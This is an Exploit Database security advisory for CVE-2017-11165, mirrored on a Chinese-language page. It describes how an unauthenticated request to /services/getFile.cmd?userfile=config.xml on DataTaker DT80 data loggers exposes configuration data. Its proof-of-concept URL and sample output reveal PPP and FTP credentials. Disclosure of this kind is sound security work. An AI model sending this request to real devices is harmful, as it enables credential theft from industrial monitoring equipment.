DataTaker DT80 dEX 1.50.012 – Information Disclosure

• Exploit Database
• 17 阅读

• 作者： Nassim Asrir
  日期： 2017-07-11
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/42313/

• [+] Title: DataTaker DT80 dEX 1.50.012 - Sensitive Configurations Exposure
  [+] Credits / Discovery: Nassim Asrir
  [+] Author Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
  [+] Author Company: Henceforth
  [+] CVE: CVE-2017-11165
   
  Vendor:
  ===============
   
  http://www.datataker.com/
  
  
  About:
  ========
  
  The dataTaker DT80 smart data logger provides an extensive array of features that allow it to be used across a wide variety of applications. The DT80 is a robust, stand alone, low power data logger featuring USB memory stick support, 18 bit resolution, extensive communications capabilities and built-in display.
  
  The dataTaker DT80’s Dual Channel concept allows up to 10 isolated or 15 common referenced analog inputs to be used in many combinations. With support for multiple SDI-12 sensor networks, Modbus for SCADA systems, FTP and Web interface, 12V regulated output to power sensors, the DT80 is a totally self contained solution.
  
  Vulnerability Type:
  ===================
   
  Sensitive Configurations Exposure.
   
   
  issue:
  ===================
   
  dataTaker dEX 1.350.012 allows remote attackers to obtain sensitive configuration information via
  a direct request for the /services/getFile.cmd?userfile=config.xml URI.
  
  POC:
  ===================
  
  http://victim/services/getFile.cmd?userfile=config.xml
  
  
  Output:
  ========
  
  <config id="config" onReset="yes" projectFileVersion="2" targetDevice="DT80-3" targetSeries="3" cemCount="1" version="2.0">
  <environment>
  <application version="1.50.012" build="2014-01-07, 15:16:53"/>
  <flashPlayer version="WIN 11.7.700.169" type="PlugIn(non-debugger)"/>
  <operatingSystem version="Windows 7"/><firmware version="9.14.5407"/>
  <screen resolution="1024x768"/>
  </environment>
  
  etc....
  
  <loggerSetting category="PPP" profile="USER">username</loggerSetting>
  
  <loggerSetting category="PPP" profile="PASSWORD">password</loggerSetting>
  
  <loggerSetting category="FTP_SERVER" profile="PORT">21</loggerSetting>
  
  <loggerSetting category="FTP_SERVER" profile="USER">arrdhor</loggerSetting>
  
  <loggerSetting category="FTP_SERVER" profile="PASSWORD">arrdhor</loggerSetting>
  
  <loggerSetting category="FTP_SERVER" profile="ALLOW_ANONYMOUS">YES</loggerSetting>